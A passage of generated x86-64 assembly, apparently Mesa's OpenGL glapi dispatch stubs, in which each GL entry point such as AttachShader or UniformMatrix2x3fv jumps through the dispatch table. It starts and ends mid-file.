.globl GL_PREFIX(MultiTexCoord3svARB)
.type GL_PREFIX(MultiTexCoord3svARB), @function
GL_PREFIX(MultiTexCoord3svARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3192(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3192(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3192(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3192(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord3svARB), .-GL_PREFIX(MultiTexCoord3svARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord4dARB)
.type GL_PREFIX(MultiTexCoord4dARB), @function
GL_PREFIX(MultiTexCoord4dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3200(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _x86_64_get_dispatch@PLT
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3200(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3200(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _glapi_get_dispatch
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3200(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord4dARB), .-GL_PREFIX(MultiTexCoord4dARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord4dvARB)
.type GL_PREFIX(MultiTexCoord4dvARB), @function
GL_PREFIX(MultiTexCoord4dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3208(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3208(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3208(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3208(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord4dvARB), .-GL_PREFIX(MultiTexCoord4dvARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord4fARB)
.type GL_PREFIX(MultiTexCoord4fARB), @function
GL_PREFIX(MultiTexCoord4fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3216(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _x86_64_get_dispatch@PLT
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3216(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3216(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _glapi_get_dispatch
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3216(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord4fARB), .-GL_PREFIX(MultiTexCoord4fARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord4fvARB)
.type GL_PREFIX(MultiTexCoord4fvARB), @function
GL_PREFIX(MultiTexCoord4fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3224(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3224(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3224(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3224(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord4fvARB), .-GL_PREFIX(MultiTexCoord4fvARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord4iARB)
.type GL_PREFIX(MultiTexCoord4iARB), @function
GL_PREFIX(MultiTexCoord4iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3232(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3232(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3232(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3232(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord4iARB), .-GL_PREFIX(MultiTexCoord4iARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord4ivARB)
.type GL_PREFIX(MultiTexCoord4ivARB), @function
GL_PREFIX(MultiTexCoord4ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3240(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3240(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3240(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3240(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord4ivARB), .-GL_PREFIX(MultiTexCoord4ivARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord4sARB)
.type GL_PREFIX(MultiTexCoord4sARB), @function
GL_PREFIX(MultiTexCoord4sARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3248(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3248(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3248(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3248(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord4sARB), .-GL_PREFIX(MultiTexCoord4sARB)
.p2align 4,,15
.globl GL_PREFIX(MultiTexCoord4svARB)
.type GL_PREFIX(MultiTexCoord4svARB), @function
GL_PREFIX(MultiTexCoord4svARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3256(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3256(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3256(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3256(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiTexCoord4svARB), .-GL_PREFIX(MultiTexCoord4svARB)
.p2align 4,,15
.globl GL_PREFIX(AttachShader)
.type GL_PREFIX(AttachShader), @function
GL_PREFIX(AttachShader):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3264(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3264(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3264(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3264(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AttachShader), .-GL_PREFIX(AttachShader)
.p2align 4,,15
.globl GL_PREFIX(CreateProgram)
.type GL_PREFIX(CreateProgram), @function
GL_PREFIX(CreateProgram):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3272(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 3272(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3272(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 3272(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CreateProgram), .-GL_PREFIX(CreateProgram)
.p2align 4,,15
.globl GL_PREFIX(CreateShader)
.type GL_PREFIX(CreateShader), @function
GL_PREFIX(CreateShader):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3280(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3280(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3280(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3280(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CreateShader), .-GL_PREFIX(CreateShader)
.p2align 4,,15
.globl GL_PREFIX(DeleteProgram)
.type GL_PREFIX(DeleteProgram), @function
GL_PREFIX(DeleteProgram):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3288(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3288(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3288(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3288(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteProgram), .-GL_PREFIX(DeleteProgram)
.p2align 4,,15
.globl GL_PREFIX(DeleteShader)
.type GL_PREFIX(DeleteShader), @function
GL_PREFIX(DeleteShader):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3296(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3296(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3296(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3296(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteShader), .-GL_PREFIX(DeleteShader)
.p2align 4,,15
.globl GL_PREFIX(DetachShader)
.type GL_PREFIX(DetachShader), @function
GL_PREFIX(DetachShader):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3304(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3304(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3304(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3304(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DetachShader), .-GL_PREFIX(DetachShader)
.p2align 4,,15
.globl GL_PREFIX(GetAttachedShaders)
.type GL_PREFIX(GetAttachedShaders), @function
GL_PREFIX(GetAttachedShaders):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3312(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3312(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3312(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3312(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetAttachedShaders), .-GL_PREFIX(GetAttachedShaders)
.p2align 4,,15
.globl GL_PREFIX(GetProgramInfoLog)
.type GL_PREFIX(GetProgramInfoLog), @function
GL_PREFIX(GetProgramInfoLog):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3320(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3320(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3320(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3320(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramInfoLog), .-GL_PREFIX(GetProgramInfoLog)
.p2align 4,,15
.globl GL_PREFIX(GetProgramiv)
.type GL_PREFIX(GetProgramiv), @function
GL_PREFIX(GetProgramiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3328(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3328(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3328(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3328(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramiv), .-GL_PREFIX(GetProgramiv)
.p2align 4,,15
.globl GL_PREFIX(GetShaderInfoLog)
.type GL_PREFIX(GetShaderInfoLog), @function
GL_PREFIX(GetShaderInfoLog):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3336(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3336(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3336(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3336(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetShaderInfoLog), .-GL_PREFIX(GetShaderInfoLog)
.p2align 4,,15
.globl GL_PREFIX(GetShaderiv)
.type GL_PREFIX(GetShaderiv), @function
GL_PREFIX(GetShaderiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3344(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3344(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3344(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3344(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetShaderiv), .-GL_PREFIX(GetShaderiv)
.p2align 4,,15
.globl GL_PREFIX(IsProgram)
.type GL_PREFIX(IsProgram), @function
GL_PREFIX(IsProgram):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3352(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3352(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3352(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3352(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsProgram), .-GL_PREFIX(IsProgram)
.p2align 4,,15
.globl GL_PREFIX(IsShader)
.type GL_PREFIX(IsShader), @function
GL_PREFIX(IsShader):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3360(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3360(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3360(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3360(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsShader), .-GL_PREFIX(IsShader)
.p2align 4,,15
.globl GL_PREFIX(StencilFuncSeparate)
.type GL_PREFIX(StencilFuncSeparate), @function
GL_PREFIX(StencilFuncSeparate):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3368(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3368(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3368(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3368(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilFuncSeparate), .-GL_PREFIX(StencilFuncSeparate)
.p2align 4,,15
.globl GL_PREFIX(StencilMaskSeparate)
.type GL_PREFIX(StencilMaskSeparate), @function
GL_PREFIX(StencilMaskSeparate):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3376(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3376(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3376(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3376(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilMaskSeparate), .-GL_PREFIX(StencilMaskSeparate)
.p2align 4,,15
.globl GL_PREFIX(StencilOpSeparate)
.type GL_PREFIX(StencilOpSeparate), @function
GL_PREFIX(StencilOpSeparate):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3384(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3384(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3384(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3384(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilOpSeparate), .-GL_PREFIX(StencilOpSeparate)
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix2x3fv)
.type GL_PREFIX(UniformMatrix2x3fv), @function
GL_PREFIX(UniformMatrix2x3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3392(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3392(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3392(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3392(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix2x3fv), .-GL_PREFIX(UniformMatrix2x3fv)
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix2x4fv)
.type GL_PREFIX(UniformMatrix2x4fv), @function
GL_PREFIX(UniformMatrix2x4fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3400(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3400(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3400(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3400(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix2x4fv), .-GL_PREFIX(UniformMatrix2x4fv)
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix3x2fv)
.type GL_PREFIX(UniformMatrix3x2fv), @function
GL_PREFIX(UniformMatrix3x2fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3408(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3408(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3408(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3408(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix3x2fv), .-GL_PREFIX(UniformMatrix3x2fv)
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix3x4fv)
.type GL_PREFIX(UniformMatrix3x4fv), @function
GL_PREFIX(UniformMatrix3x4fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3416(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3416(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3416(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3416(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix3x4fv), .-GL_PREFIX(UniformMatrix3x4fv)
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix4x2fv)
.type GL_PREFIX(UniformMatrix4x2fv), @function
GL_PREFIX(UniformMatrix4x2fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3424(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3424(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3424(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3424(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix4x2fv), .-GL_PREFIX(UniformMatrix4x2fv)
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix4x3fv)
.type GL_PREFIX(UniformMatrix4x3fv), @function
GL_PREFIX(UniformMatrix4x3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3432(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3432(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3432(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3432(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix4x3fv), .-GL_PREFIX(UniformMatrix4x3fv)
.p2align 4,,15
.globl GL_PREFIX(LoadTransposeMatrixdARB)
.type GL_PREFIX(LoadTransposeMatrixdARB), @function
GL_PREFIX(LoadTransposeMatrixdARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3440(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3440(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3440(%rax), %r11
jmp *%r11
1:
pushq %rdi
